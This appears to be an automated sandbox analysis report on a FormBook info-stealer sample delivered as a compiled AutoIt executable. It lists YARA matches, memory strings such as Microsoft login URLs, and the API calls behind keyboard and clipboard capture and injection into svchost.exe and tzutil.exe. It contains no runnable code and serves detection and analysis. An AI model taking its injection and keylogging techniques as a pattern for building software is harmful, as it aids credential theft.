                Source: tzutil.exe, 0000000B.00000002.3118417486.0000000004304000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3120076643.0000000006800000.00000004.00000800.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000002.3117680832.0000000002DC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2016740097.0000000035E34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10336
                Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: tzutil.exe, 0000000B.00000002.3115425477.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: tzutil.exe, 0000000B.00000003.1907373844.0000000008223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: tzutil.exe, 0000000B.00000002.3120155754.000000000824E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00964164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00964164
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00964164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00964164
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00963F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00963F66
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0095001C
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0097CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0097CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3117606831.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1724224119.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3117644043.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3119039119.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1725678953.0000000005150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3114871979.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1725336677.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3117803218.0000000004580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: This is a third-party compiled AutoIt script.0_2_008F3B3A
                Source: 01152-11-12-24.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 01152-11-12-24.exe, 00000000.00000000.1249973401.00000000009A4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0c594399-5
                Source: 01152-11-12-24.exe, 00000000.00000000.1249973401.00000000009A4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_6a88c564-4
                Source: 01152-11-12-24.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_92302f70-2
                Source: 01152-11-12-24.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_ca152aaa-a
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042C9E3 NtClose,7_2_0042C9E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972B60 NtClose,LdrInitializeThunk,7_2_03972B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03972DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039735C0 NtCreateMutant,LdrInitializeThunk,7_2_039735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03974340 NtSetContextThread,7_2_03974340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03974650 NtSuspendThread,7_2_03974650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972B80 NtQueryInformationFile,7_2_03972B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972BA0 NtEnumerateValueKey,7_2_03972BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972BF0 NtAllocateVirtualMemory,7_2_03972BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972BE0 NtQueryValueKey,7_2_03972BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972AB0 NtWaitForSingleObject,7_2_03972AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972AD0 NtReadFile,7_2_03972AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972AF0 NtWriteFile,7_2_03972AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972F90 NtProtectVirtualMemory,7_2_03972F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972FB0 NtResumeThread,7_2_03972FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972FA0 NtQuerySection,7_2_03972FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972FE0 NtCreateFile,7_2_03972FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972F30 NtCreateSection,7_2_03972F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972F60 NtCreateProcessEx,7_2_03972F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972E80 NtReadVirtualMemory,7_2_03972E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972EA0 NtAdjustPrivilegesToken,7_2_03972EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972EE0 NtQueueApcThread,7_2_03972EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972E30 NtWriteVirtualMemory,7_2_03972E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972DB0 NtEnumerateKey,7_2_03972DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972DD0 NtDelayExecution,7_2_03972DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972D10 NtMapViewOfSection,7_2_03972D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972D00 NtSetInformationFile,7_2_03972D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972D30 NtUnmapViewOfSection,7_2_03972D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972CA0 NtQueryInformationToken,7_2_03972CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972CC0 NtQueryVirtualMemory,7_2_03972CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972CF0 NtOpenProcess,7_2_03972CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972C00 NtQueryInformationProcess,7_2_03972C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972C70 NtFreeVirtualMemory,7_2_03972C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972C60 NtCreateKey,7_2_03972C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03973090 NtSetValueKey,7_2_03973090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03973010 NtOpenDirectoryObject,7_2_03973010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039739B0 NtGetContextThread,7_2_039739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03973D10 NtOpenProcessToken,7_2_03973D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03973D70 NtOpenThread,7_2_03973D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03964340 NtSetContextThread,LdrInitializeThunk,11_2_03964340
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03964650 NtSuspendThread,LdrInitializeThunk,11_2_03964650
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_03962BA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03962BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962BE0 NtQueryValueKey,LdrInitializeThunk,11_2_03962BE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962B60 NtClose,LdrInitializeThunk,11_2_03962B60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962AD0 NtReadFile,LdrInitializeThunk,11_2_03962AD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962AF0 NtWriteFile,LdrInitializeThunk,11_2_03962AF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962FB0 NtResumeThread,LdrInitializeThunk,11_2_03962FB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962FE0 NtCreateFile,LdrInitializeThunk,11_2_03962FE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962F30 NtCreateSection,LdrInitializeThunk,11_2_03962F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_03962E80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03962EE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962DD0 NtDelayExecution,LdrInitializeThunk,11_2_03962DD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03962DF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03962D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_03962D30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_03962CA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03962C70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962C60 NtCreateKey,LdrInitializeThunk,11_2_03962C60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039635C0 NtCreateMutant,LdrInitializeThunk,11_2_039635C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_039639B0 NtGetContextThread,LdrInitializeThunk,11_2_039639B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962B80 NtQueryInformationFile,11_2_03962B80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962AB0 NtWaitForSingleObject,11_2_03962AB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962F90 NtProtectVirtualMemory,11_2_03962F90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962FA0 NtQuerySection,11_2_03962FA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962F60 NtCreateProcessEx,11_2_03962F60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962EA0 NtAdjustPrivilegesToken,11_2_03962EA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962E30 NtWriteVirtualMemory,11_2_03962E30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962DB0 NtEnumerateKey,11_2_03962DB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962D00 NtSetInformationFile,11_2_03962D00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962CC0 NtQueryVirtualMemory,11_2_03962CC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962CF0 NtOpenProcess,11_2_03962CF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03962C00 NtQueryInformationProcess,11_2_03962C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03963090 NtSetValueKey,11_2_03963090
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03963010 NtOpenDirectoryObject,11_2_03963010
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03963D10 NtOpenProcessToken,11_2_03963D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_03963D70 NtOpenThread,11_2_03963D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030B9720 NtClose,11_2_030B9720
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030B9680 NtDeleteFile,11_2_030B9680
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030B9590 NtReadFile,11_2_030B9590
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030B9420 NtCreateFile,11_2_030B9420
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 11_2_030B9890 NtAllocateVirtualMemory,11_2_030B9890
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0095A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0095A1EF
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00948310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00948310
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009551BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009551BD
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008FE6A00_2_008FE6A0
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0091D9750_2_0091D975
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008FFCE00_2_008FFCE0
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009121C50_2_009121C5
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009262D20_2_009262D2
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009703DA0_2_009703DA
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0092242E0_2_0092242E
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009125FA0_2_009125FA
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009066E10_2_009066E1
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0094E6160_2_0094E616
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0092878F0_2_0092878F
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009588890_2_00958889
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009088080_2_00908808
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009708570_2_00970857
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009268440_2_00926844
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0091CB210_2_0091CB21
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00926DB60_2_00926DB6
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00906F9E0_2_00906F9E
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009030300_2_00903030
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009131870_2_00913187
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0091F1D90_2_0091F1D9
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008F12870_2_008F1287
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009114840_2_00911484
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009055200_2_00905520
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009176960_2_00917696
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009057600_2_00905760
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009119780_2_00911978
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00929AB50_2_00929AB5
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00911D900_2_00911D90
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0091BDA60_2_0091BDA6
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00977DDB0_2_00977DDB
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_00903FE00_2_00903FE0
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_008FDF000_2_008FDF00
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_014164700_2_01416470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004189037_2_00418903
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004030507_2_00403050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042F0837_2_0042F083
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004101637_2_00410163
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402B667_2_00402B66
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402B707_2_00402B70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00416B0E7_2_00416B0E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00416B137_2_00416B13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004103837_2_00410383
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E3837_2_0040E383
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E4D17_2_0040E4D1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E4D37_2_0040E4D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040274A7_2_0040274A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004027507_2_00402750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A003E67_2_03A003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394E3F07_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FA3527_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C02C07_2_039C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E02747_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A001AA7_2_03A001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F41A27_2_039F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F81CC7_2_039F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DA1187_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039301007_2_03930100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C81587_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D20007_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393C7C07_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039647507_2_03964750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039407707_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395C6E07_2_0395C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A005917_2_03A00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039405357_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EE4F67_2_039EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E44207_2_039E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F24467_2_039F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F6BD77_2_039F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FAB407_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393EA807_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A0A9A67_2_03A0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A07_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039569627_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039268B87_2_039268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E8F07_2_0396E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394A8407_2_0394A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039428407_2_03942840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BEFA07_2_039BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03932FC87_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394CFE07_2_0394CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03960F307_2_03960F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E2F307_2_039E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03982F287_2_03982F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B4F407_2_039B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03952E907_2_03952E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FCE937_2_039FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FEEDB7_2_039FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393AE0D7_2_0393AE0D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FEE267_2_039FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940E597_2_03940E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03958DBF7_2_03958DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DCD1F7_2_039DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394AD007_2_0394AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0CB57_2_039E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03930CF27_2_03930CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940C007_2_03940C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0398739A7_2_0398739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F132D7_2_039F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392D34C7_2_0392D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039452A07_2_039452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395B2C07_2_0395B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E12ED7_2_039E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394B1B07_2_0394B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A0B16B7_2_03A0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392F1727_2_0392F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0397516C7_2_0397516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EF0CC7_2_039EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039470C07_2_039470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F70E97_2_039F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FF0E07_2_039FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FF7B07_2_039FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F16CC7_2_039F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039856307_2_03985630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DD5B07_2_039DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A095C37_2_03A095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F75717_2_039F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FF43F7_2_039FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039314607_2_03931460
